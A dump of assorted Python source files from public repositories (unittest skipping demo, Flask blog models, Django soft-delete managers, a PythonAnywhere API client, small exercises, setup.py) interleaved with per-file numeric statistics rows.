| 20.2 | 80 | 0.757426 | 26 | 202 | 5.615385 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047337 | 0.163366 | 202 | 9 | 81 | 22.444444 | 0.816568 | 0 | 0 | 0 | 0 | 0 | 0.129353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
766e873236e512511ee845050ba334664937c0c7 | 620 | py | Python | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 73 | 2016-09-15T23:07:04.000Z | 2022-03-05T15:09:48.000Z | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 34 | 2019-12-16T16:53:24.000Z | 2022-01-13T02:29:30.000Z | books/python-3-oop-packt/Chapter12/12_05_skipping_tests.py | phiratio/lpthw | a32240d4355fb331805d515f96e1d009914e5c47 | [
"MIT"
] | 51 | 2016-10-07T20:47:51.000Z | 2021-12-22T21:00:24.000Z | import unittest
import sys
class SkipTests(unittest.TestCase):
@unittest.expectedFailure
def test_fails(self):
self.assertEqual(False, True)
@unittest.skip("Test is useless")
def test_skip(self):
self.assertEqual(False, True)
@unittest.skipIf(sys.version_info.minor == 4,
"broken on 3.4")
def test_skipif(self):
self.assertEqual(False, True)
@unittest.skipUnless(sys.platform.startswith('linux'),
"broken unless on linux")
def test_skipunless(self):
self.assertEqual(False, True)
if __name__ == "__main__":
unittest.main()
| 24.8 | 58 | 0.658065 | 73 | 620 | 5.410959 | 0.452055 | 0.070886 | 0.192405 | 0.243038 | 0.344304 | 0.273418 | 0 | 0 | 0 | 0 | 0 | 0.006237 | 0.224194 | 620 | 24 | 59 | 25.833333 | 0.814969 | 0 | 0 | 0.210526 | 0 | 0 | 0.101613 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.210526 | false | 0 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
766edd163148fb3ce2a73f8bdc17845525f03709 | 2,688 | py | Python | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | flaskbog/models.py | MuthangaShem/flask-blog | 5b32bcd0c8592763f871a1c421ecf0f0ea7adc14 | [
"MIT"
] | null | null | null | from flask.ext.sqlalchemy import SQLAlchemy
from werkzeug import generate_password_hash, check_password_hash
from flaskblog import app
from config import WHOOSH_ENABLED
from math import ceil
db = SQLAlchemy(app)
class Admin(db.Model):
__tablename__ = 'admin'
id = db.Column(db.Integer, primary_key=True)
userd = db.Column(db.String(100))
def __init__(self, user):
self.user = user
def __repr__(self):
return "<User: %s>" % (self.userd)
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id)
tags = db.Table('posts_tags',
db.Column('tag_id', db.Integer, db.ForeignKey('tags.id')),
db.Column('post_id', db.Integer, db.ForeignKey('posts.id'))
)
class Post(db.Model):
__tablename__ = 'posts'
__searchable__ = ['text']
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(120))
text = db.Column(db.Text,)
tags = db.relationship('Tag', secondary=tags, backref=db.backref('posts', lazy='dynamic'))
def __init__(self, title, text, tags):
self.title = title
self.text = text
self.tags = tags
def __repr__(self):
return '<Title %r, Text %r, Tag %r>' % (self.title, self.text, self.tags)
class Tag(db.Model):
__tablename__ = 'tags'
id = db.Column(db.Integer, primary_key=True)
tag = db.Column(db.String(120))
def __init__(self, tag):
self.tag = tag
def __repr__(self):
return '<Tag %r>' % self.tag
class Pagination(object):
def __init__(self, page, per_page, total_count):
self.page = page
self.per_page = per_page
self.total_count = total_count
@property
def pages(self):
return int(ceil(self.total_count / float(self.per_page)))
@property
def has_prev(self):
return self.page > 1
@property
def has_next(self):
return self.page < self.pages
def iter_pages(self, left_edge=2, left_current=2,
right_current=5, right_edge=2):
last = 0
for num in xrange(1, self.pages + 1):
if num <= left_edge or \
(num > self.page - left_current - 1 and
num < self.page + right_current) or \
num > self.pages - right_edge:
if last + 1 != num:
yield None
yield num
last = num
if WHOOSH_ENABLED:
import flask.ext.whooshalchemy as whooshalchemy
whooshalchemy.whoosh_index(app, Post)
| 25.121495 | 94 | 0.599702 | 352 | 2,688 | 4.352273 | 0.272727 | 0.065274 | 0.045692 | 0.023499 | 0.144256 | 0.064621 | 0.064621 | 0.064621 | 0 | 0 | 0 | 0.009911 | 0.28683 | 2,688 | 106 | 95 | 25.358491 | 0.789254 | 0 | 0 | 0.144737 | 1 | 0 | 0.043155 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.197368 | false | 0.013158 | 0.078947 | 0.131579 | 0.618421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7676d462ee542ed87de95de7c08ee86a04763486 | 272 | py | Python | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | ds/linklist/node.py | BizShuk/code_algo | 1964a16ba382b360d85937b65b8acd51c1eb5418 | [
"MIT"
] | null | null | null | class Node(object):
"""Docstring for Node. """
def __init__(self,val , next=None):
"""TODO: to be defined1. """
self.next = next if next is not None
self.val = val
def isCircle(self):
pass
def length(self):
pass
| 18.133333 | 44 | 0.536765 | 35 | 272 | 4.057143 | 0.6 | 0.098592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005556 | 0.338235 | 272 | 14 | 45 | 19.428571 | 0.783333 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0 | 0 | null | null | 0.25 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
768264c563fd0507706f9581b69eab3475ef4389 | 131 | py | Python | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | 2 | 2017-12-07T02:02:05.000Z | 2017-12-10T00:14:44.000Z | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | null | null | null | train.py | tonypeng/ez-image-segmentation | 94ac965cee1d11b7118890ca0219c04e60e7435b | [
"MIT"
] | null | null | null | from Trainer import *
from TrainerOptions import *
opt = TrainerOptions()
opt.parse_args()
trainer = Trainer(opt)
trainer.train() | 16.375 | 28 | 0.763359 | 16 | 131 | 6.1875 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129771 | 131 | 8 | 29 | 16.375 | 0.868421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
7692deee3b24ee25055a2b5cefb7aaffcbc347d6 | 801 | py | Python | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | null | null | null | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | null | null | null | python_for_everybody/unicode.py | timothyyu/p4e-prac | f978b71ce147b6e9058372929f2666c2e67d0741 | [
"BSD-3-Clause"
] | 1 | 2020-04-18T16:09:04.000Z | 2020-04-18T16:09:04.000Z | #Unicode characters and strings
#1960s/1970s ---> we assumed one byte is one character and went it with
# a byte and character were assumed to be the same thing
#ASCII goes up to 127
print(ord('H'))
print(ord('e'))
print(ord('\n'))
print(ord('G'))
#UTF-16 - fixed length, two byes
#UTF-32 - fixed length, four byes
#UTF-8 - 1-4 bytes
# upwards compat with ASCII
# auto detection between ASCII & UTF-8
# UTF-8 rec best pracetice for encoding/data exchange between systems
# in python3, all strings are unicode
# data in from external resource
# must be decoded based on its character set so it's properly represented in py3 as a string
# when talking to external network resource that sends bytes,
# you need to encode the py3 strings into a given char encoding | 33.375 | 96 | 0.71161 | 133 | 801 | 4.285714 | 0.661654 | 0.05614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03645 | 0.212235 | 801 | 24 | 97 | 33.375 | 0.866878 | 0.831461 | 0 | 0 | 0 | 0 | 0.041322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
76a8ad4e4b64bc7dd9adb094028e31014909c8fe | 4,201 | py | Python | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 6 | 2019-06-30T20:59:38.000Z | 2019-12-28T11:02:11.000Z | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 5 | 2019-06-30T18:55:15.000Z | 2020-06-19T15:37:01.000Z | pythonanywhere_client/webapps.py | hakancelik96/pythonanywhere-client | 52c8913760304c30150157b961e93c4a4bf5e82f | [
"MIT"
] | 1 | 2019-12-28T17:04:37.000Z | 2019-12-28T17:04:37.000Z | from .client import client_decorator
class Webapps:
def __init__(self, client):
self.client = client
@client_decorator(op="webapps")
def get(self):
"List all webapps"
@client_decorator(op="webapps")
def post(self, domain_name, python_version):
"""
Create a new webapp with manual configuration.
Use (for example) "python36" to specify Python 3.6.
"""
class DomaiName:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}")
def get(self):
"Return information about a web app's configuration"
@client_decorator(op="webapps", name="{self.domain_name}")
def put(
self, python_version, source_directory, virtualenv_path, force_https
):
"Modify configuration of a web app. (NB a reload is usually required to apply changes)."
@client_decorator(op="webapps", name="{self.domain_name}")
def patch(
self, python_version, source_directory, virtualenv_path, force_https
):
"Modify configuration of a web app. (NB a reload is usually required to apply changes)."
@client_decorator(op="webapps", name="{self.domain_name}")
def delete(self):
"""
Delete the webapp. This will take the site offline.
Config is backed up in /var/www, and your code is not touched.
"""
class Reload:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}", path="reload")
def post(self):
"Reload the webapp to reflect changes to configuration and/or source code on disk."
class Ssl:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def get(self):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def post(
self, python_version, source_directory, virtualenv_path, force_https
):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
@client_decorator(op="webapps", name="{self.domain_name}", path="ssl")
def delete(self):
"""
Get and set TLS/HTTPS info. POST parameters to the right are incorrect,
use `cert` and `private_key` when posting.
"""
class StaticFiles:
def __init__(self, client, domain_name):
self.client = client
self.domain_name = domain_name
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files"
)
def get(self):
"List all the static files mappings for a domain."
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files"
)
def post(self, url, path):
"Create a new static files mapping. (webapp restart required)"
class StaticFilesId:
def __init__(self, client, domain_name, id):
self.client = client
self.domain_name = domain_name
self.id = id
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def get(self):
"Get URL and path of a particular mapping."
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def put(self, url, path):
"Modify a static files mapping. (webapp restart required)"
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def patch(self, url, path):
"Modify a static files mapping. (webapp restart required)"
@client_decorator(
op="webapps", name="{self.domain_name}", path="static_files/{self.id}"
)
def delete(self):
"Remove a static files mapping. (webapp restart required)"
| 31.118519 | 96 | 0.63961 | 537 | 4,201 | 4.83054 | 0.191806 | 0.115652 | 0.107941 | 0.148034 | 0.752506 | 0.720894 | 0.695451 | 0.680031 | 0.664611 | 0.624518 | 0 | 0.001258 | 0.243037 | 4,201 | 134 | 97 | 31.350746 | 0.814465 | 0.286836 | 0 | 0.627907 | 0 | 0 | 0.3232 | 0.025237 | 0 | 0 | 0 | 0 | 0 | 1 | 0.255814 | false | 0 | 0.011628 | 0 | 0.337209 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76c2da6bb9112f5fb0067799713d55cf0a448eb6 | 241 | py | Python | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | specviz/tests/test_startup.py | ibusko/specviz | b8bcd495e5b43dc2b90f7bf2d5bad2d27c6990aa | [
"BSD-3-Clause"
] | null | null | null | from qtpy import QtCore
from specviz.app import Application
def test_specviz_startup(qtbot):
app = Application([], dev=True)
qtbot.addWidget(app.current_workspace)
qtbot.mouseClick(app.current_workspace, QtCore.Qt.LeftButton)
| 24.1 | 65 | 0.775934 | 31 | 241 | 5.903226 | 0.612903 | 0.10929 | 0.20765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13278 | 241 | 9 | 66 | 26.777778 | 0.875598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
4f180829cd0e9a3948d5bb3da916f00952583927 | 1,083 | py | Python | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | 1 | 2021-06-26T17:07:53.000Z | 2021-06-26T17:07:53.000Z | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | null | null | null | Cursoemvideo/URI/1018 - Banknotes.py | Vith-MCB/Phyton---Curso-em-Video | d13a2150df022b9712b3b3136e9afc963864403c | [
"MIT"
] | null | null | null | '''
N = int(input())
notas100 = N//100
notas50 = (N-(notas100*100))//50
notas20 = (N-(notas100*100+notas50*50))//20
notas10 = (N-(notas100*100+notas50*50+notas20*20))//10
notas5 = (N-(notas100*100+notas50*50+notas20*20+notas10*10))//5
notas2 = (N-(notas100*100+notas50*50+notas20*20+notas10*10+notas5*5))//2
notas1 = (N-(notas100*100+notas50*50+notas20*20+notas10*10+notas5*5+notas2*2))
print(notas100, ' nota(s) de R$ 100,00')
print(notas50, ' nota(s) de R$ 50,00')
print(notas20, ' nota(s) de R$ 20,00')
print(notas10, ' nota(s) de R$ 10,00')
print(notas5, ' nota(s) de R$ 5,00')
print(notas2, ' nota(s) de R$ 2,00')
print(notas1, ' nota(s) de R$ 1,00')
'''
N = int(input())
n100 = N//100
N = N - n100*100
n50 = N//50
N = N - n50*50
n20 = N//20
N = N - n20*20
n10 = N//10
N = N - n10*10
n5 = N//5
N = N - n5*5
n2 = N//2
N = N - n2*2
n1 = N
print(n100, ' nota(s) de R$ 100,00')
print(n50, ' nota(s) de R$ 50,00')
print(n20, ' nota(s) de R$ 20,00')
print(n10, ' nota(s) de R$ 10,00')
print(n5, ' nota(s) de R$ 5,00')
print(n2, ' nota(s) de R$ 2,00')
print(n1, ' nota(s) de R$ 1,00') | 27.769231 | 78 | 0.604801 | 224 | 1,083 | 2.924107 | 0.133929 | 0.10687 | 0.149618 | 0.170992 | 0.619847 | 0.587786 | 0.554198 | 0.2 | 0.2 | 0.140458 | 0 | 0.254625 | 0.151431 | 1,083 | 39 | 79 | 27.769231 | 0.458107 | 0.602031 | 0 | 0 | 0 | 0 | 0.325472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f264991488a362e89d5b91959e0b88b2e880b7b | 1,482 | py | Python | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | public_comment/lib/managers.py | codeforkyana/public-comment | b2e579ce0e1e8117670eaff6f142b594e6c78dc8 | [
"MIT"
] | null | null | null | import logging
from datetime import datetime
from django.db import models
from django.db.models import QuerySet
from . import _thread_locals
logger = logging.getLogger(__name__)
class SoftDeleteManager(models.Manager):
def __init__(self, *args, **kwargs):
self.with_deleted = kwargs.pop("deleted", False)
super().__init__(*args, **kwargs)
def _base_queryset(self):
return SoftDeleteQuerySet(self.model)
def get_queryset(self):
qs = self._base_queryset()
if self.with_deleted:
return qs
return qs.filter(deleted_at=None)
class SoftDeleteQuerySet(QuerySet):
def delete(self):
return super().update(deleted_at=datetime.utcnow())
def hard_delete(self):
return super().delete()
def restore(self):
return super().update(deleted_at=None)
class OrganizationOwnedModelManager(SoftDeleteManager):
def __init__(self, *args, **kwargs):
self.with_deleted = kwargs.pop("deleted", False)
super().__init__(*args, **kwargs)
def get_queryset(self):
qs = super().get_queryset()
if self.model.__name__ != "Organization":
organization = getattr(_thread_locals, "organization", None)
if organization:
logger.info("Setting organization on queryset to %s (%s)", organization, organization.id)
return qs.filter(organization=organization).prefetch_related("organization")
return qs
| 29.058824 | 105 | 0.669366 | 164 | 1,482 | 5.786585 | 0.317073 | 0.04215 | 0.047418 | 0.031612 | 0.268704 | 0.229715 | 0.166491 | 0.166491 | 0.166491 | 0.166491 | 0 | 0 | 0.221997 | 1,482 | 50 | 106 | 29.64 | 0.82307 | 0 | 0 | 0.277778 | 0 | 0 | 0.062753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.138889 | 0.111111 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
4f2998a54e1c8d576f1abf4eaabd4425870ed461 | 561 | py | Python | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | app/pytorch/book/chp004/e1/cross_entropy.py | yt7589/aqp | c9c1c79facdea7ace73e2421e8a5868d87fb58dd | [
"Apache-2.0"
] | null | null | null | from __future__ import division
import numpy as np
from loss import Loss
from npai_stats import NpaiStats
from sigmoid import Sigmoid
class CrossEntropy(Loss):
def __init__(self): pass
def loss(self, y, p):
# Avoid division by zero
p = np.clip(p, 1e-15, 1 - 1e-15)
return - y * np.log(p)
def acc(self, y, p):
return NpaiStats.accuracy_score(np.argmax(y, axis=1), np.argmax(p, axis=1))
def gradient(self, y, p):
# Avoid division by zero
p = np.clip(p, 1e-15, 1 - 1e-15)
return - (y / p) | 26.714286 | 83 | 0.616756 | 91 | 561 | 3.692308 | 0.384615 | 0.02381 | 0.053571 | 0.065476 | 0.291667 | 0.291667 | 0.291667 | 0.291667 | 0.291667 | 0.291667 | 0 | 0.039024 | 0.269162 | 561 | 21 | 84 | 26.714286 | 0.780488 | 0.080214 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0.066667 | 0.333333 | 0.066667 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
4f2c83bf688f78376d32efdf1389eb175038991e | 1,134 | py | Python | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 210 | 2016-04-09T14:26:00.000Z | 2022-03-25T18:36:19.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 72 | 2016-09-04T09:30:19.000Z | 2022-03-27T17:06:53.000Z | deep-rl/lib/python2.7/site-packages/OpenGL/GL/EXT/framebuffer_blit.py | ShujaKhalid/deep-rl | 99c6ba6c3095d1bfdab81bd01395ced96bddd611 | [
"MIT"
] | 64 | 2016-04-09T14:26:49.000Z | 2022-03-21T11:19:47.000Z | '''OpenGL extension EXT.framebuffer_blit
This module customises the behaviour of the
OpenGL.raw.GL.EXT.framebuffer_blit to provide a more
Python-friendly API
Overview (from the spec)
This extension modifies EXT_framebuffer_object by splitting the
framebuffer object binding point into separate DRAW and READ
bindings. This allows copying directly from one framebuffer to
another. In addition, a new high performance blit function is
added to facilitate these blits and perform some data conversion
where allowed.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/framebuffer_blit.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.EXT.framebuffer_blit import *
from OpenGL.raw.GL.EXT.framebuffer_blit import _EXTENSION_NAME
def glInitFramebufferBlitEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | 35.4375 | 71 | 0.810406 | 157 | 1,134 | 5.770701 | 0.55414 | 0.092715 | 0.099338 | 0.046358 | 0.118102 | 0.118102 | 0.086093 | 0.086093 | 0 | 0 | 0 | 0 | 0.137566 | 1,134 | 32 | 72 | 35.4375 | 0.92638 | 0.69224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | true | 0 | 0.777778 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
4f399d57acd5e7e7e858c15b1176f7d92c46f168 | 171 | py | Python | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | HackerRank/Problem Solving/Algorithms/Implementation/Save the Prisoner!.py | anubhab-code/Competitive-Programming | de28cb7d44044b9e7d8bdb475da61e37c018ac35 | [
"MIT"
] | null | null | null | t = int(input())
while t > 0:
t -= 1
n,m,s = map(int, input().strip().split(' '))
k = (s+m-1)%n
if(k==0):
print (n)
else:
print (k) | 19 | 48 | 0.391813 | 29 | 171 | 2.310345 | 0.551724 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 0.368421 | 171 | 9 | 49 | 19 | 0.583333 | 0 | 0 | 0 | 0 | 0 | 0.005814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f62520b0b21b6f7234956507a4d3fe693faf604 | 1,093 | py | Python | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | 3 | 2020-11-23T10:07:47.000Z | 2021-06-15T14:21:32.000Z | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | null | null | null | setup.py | JorisCos/asteroid_gan_exps | e3b9d3dc76265b3f4574ecb451df105f26acab3e | [
"MIT"
] | 1 | 2020-12-03T13:40:46.000Z | 2020-12-03T13:40:46.000Z | from setuptools import setup, find_packages
setup(
name='asteroid_gan_exps',
version='0.1',
author='Joris Cosentino',
author_email='joris.cosentino@inria.fr',
url="https://github.com/JorisCos/asteroid_gan_exps",
description='Experiments on GANs using Asteroid',
license='MIT',
python_requires='>=3.6',
install_requires=['soundfile',
'pyyaml',
'pandas',
'numpy',
'tqdm',
'asteroid',
'scipy',
'pystoi'
],
extras_require={
'tests': ['pytest'],
},
packages=find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | 30.361111 | 56 | 0.518756 | 97 | 1,093 | 5.721649 | 0.680412 | 0.136937 | 0.18018 | 0.187387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01683 | 0.347667 | 1,093 | 36 | 57 | 30.361111 | 0.761571 | 0 | 0 | 0.058824 | 0 | 0 | 0.414991 | 0.021938 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4f749e412e06600292b62125fe88585f0709a995 | 196 | py | Python | GeometricOpticsPy/OpticalSystem.py | NicoDeshler/GeometricOpticsPy | b808a506596fa532026c0f22e734dd66ed8c2b12 | [
